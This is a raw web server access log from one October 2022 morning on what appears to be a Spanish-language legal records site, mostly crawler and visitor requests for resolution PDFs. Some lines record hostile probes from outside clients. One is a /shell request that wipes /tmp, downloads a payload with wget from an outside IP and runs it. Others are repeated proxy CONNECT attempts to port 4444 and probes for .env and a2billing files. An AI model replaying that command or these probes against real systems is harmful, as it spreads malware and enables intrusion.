94.232.47.167 - - [19/Oct/2022:03:14:17 -0500] "\x03" 400 226
23.140.88.145 - - [19/Oct/2022:03:14:42 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
201.245.192.253 - - [19/Oct/2022:03:15:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
216.245.221.92 - - [19/Oct/2022:03:17:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:03:16:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.55.68.44 - - [19/Oct/2022:03:18:44 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.55.68.44 - - [19/Oct/2022:03:18:47 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 299046
172.22.2.4 - - [19/Oct/2022:03:17:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
201.245.192.253 - - [19/Oct/2022:03:20:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
23.140.88.145 - - [19/Oct/2022:03:21:35 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
201.245.192.253 - - [19/Oct/2022:03:21:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42974
201.245.192.253 - - [19/Oct/2022:03:21:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43616
216.245.221.92 - - [19/Oct/2022:03:22:04 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:03:22:31 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1018
114.119.141.51 - - [19/Oct/2022:03:22:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3570.pdf HTTP/1.1" 200 1726626
172.22.2.4 - - [19/Oct/2022:03:22:31 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 24523
80.94.92.239 - - [19/Oct/2022:03:23:15 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [19/Oct/2022:03:22:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.141.51 - - [19/Oct/2022:03:24:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0520.pdf HTTP/1.1" 200 407112
172.22.2.4 - - [19/Oct/2022:03:23:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
201.245.192.253 - - [19/Oct/2022:03:25:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
114.119.132.76 - - [19/Oct/2022:03:25:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/6328.pdf HTTP/1.1" 200 468193
216.245.221.92 - - [19/Oct/2022:03:27:04 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.51 - - [19/Oct/2022:03:28:01 -0500] "GET /BLA/resoluciones/AUTOS%202014/0119.pdf HTTP/1.1" 200 890526
66.249.73.97 - - [19/Oct/2022:03:28:41 -0500] "-" 408 -
23.140.88.145 - - [19/Oct/2022:03:28:44 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
172.22.2.4 - - [19/Oct/2022:03:28:49 -0500] "GET /BLA/boletinlegal/a2billing/customer/templates/default/footer.tpl HTTP/1.1" 404 1018
114.119.141.69 - - [19/Oct/2022:03:29:35 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2003/ HTTP/1.1" 200 13300
207.46.13.84 - - [19/Oct/2022:03:29:47 -0500] "GET /transparencia/General%20Asignado/? HTTP/1.1" 200 43125
172.22.2.4 - - [19/Oct/2022:03:28:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Oct/2022:03:30:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
172.22.2.4 - - [19/Oct/2022:03:29:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
114.119.141.69 - - [19/Oct/2022:03:31:09 -0500] "GET /BLA/resoluciones/AUTOS%202017/1765.pdf HTTP/1.1" 200 494191
201.245.192.253 - - [19/Oct/2022:03:31:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42974
201.245.192.253 - - [19/Oct/2022:03:31:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43616
216.245.221.92 - - [19/Oct/2022:03:32:04 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.42 - - [19/Oct/2022:03:32:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3086.pdf HTTP/1.1" 200 384680
114.119.141.71 - - [19/Oct/2022:03:35:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1683.pdf HTTP/1.1" 200 736798
201.245.192.253 - - [19/Oct/2022:03:35:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
23.140.88.145 - - [19/Oct/2022:03:35:49 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
172.22.2.4 - - [19/Oct/2022:03:34:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Oct/2022:03:35:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
216.245.221.92 - - [19/Oct/2022:03:37:04 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.73 - - [19/Oct/2022:03:37:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2652.pdf HTTP/1.1" 200 338126
207.46.13.190 - - [19/Oct/2022:03:37:15 -0500] "GET /BLA/resoluciones/00000327.tif HTTP/1.1" 404 1018
114.119.141.52 - - [19/Oct/2022:03:38:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4396.pdf HTTP/1.1" 200 490007
147.91.199.158 - - [19/Oct/2022:03:39:09 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [19/Oct/2022:03:40:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
201.245.192.253 - - [19/Oct/2022:03:41:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42974
201.245.192.253 - - [19/Oct/2022:03:41:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43616
172.22.2.4 - - [19/Oct/2022:03:40:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
103.234.94.23 - - [19/Oct/2022:03:42:00 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [19/Oct/2022:03:42:04 -0500] "HEAD / HTTP/1.1" 200 -
114.119.132.76 - - [19/Oct/2022:03:42:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202901%20AL%203000/RESOLUCION%202991%20DE%202007.pdf HTTP/1.1" 200 704954
66.249.73.127 - - [19/Oct/2022:03:42:20 -0500] "-" 408 -
172.22.2.4 - - [19/Oct/2022:03:40:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
23.140.88.145 - - [19/Oct/2022:03:42:56 -0500] "CONNECT 45.85.219.125:4444 HTTP/1.1" 405 941
114.119.141.51 - - [19/Oct/2022:03:43:50 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B2013/&sort=date&order=desc HTTP/1.1" 200 13361
201.245.192.253 - - [19/Oct/2022:03:45:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43296
114.119.141.42 - - [19/Oct/2022:03:45:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1600.pdf HTTP/1.1" 200 335916
172.22.2.4 - - [19/Oct/2022:03:46:55 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2003%20del%2024%20de%20Febrero%20de%202017.pdf HTTP/1.1" 304 -
216.245.221.92 - - [19/Oct/2022:03:47:04 -0500] "HEAD / HTTP/1.1" 200 -
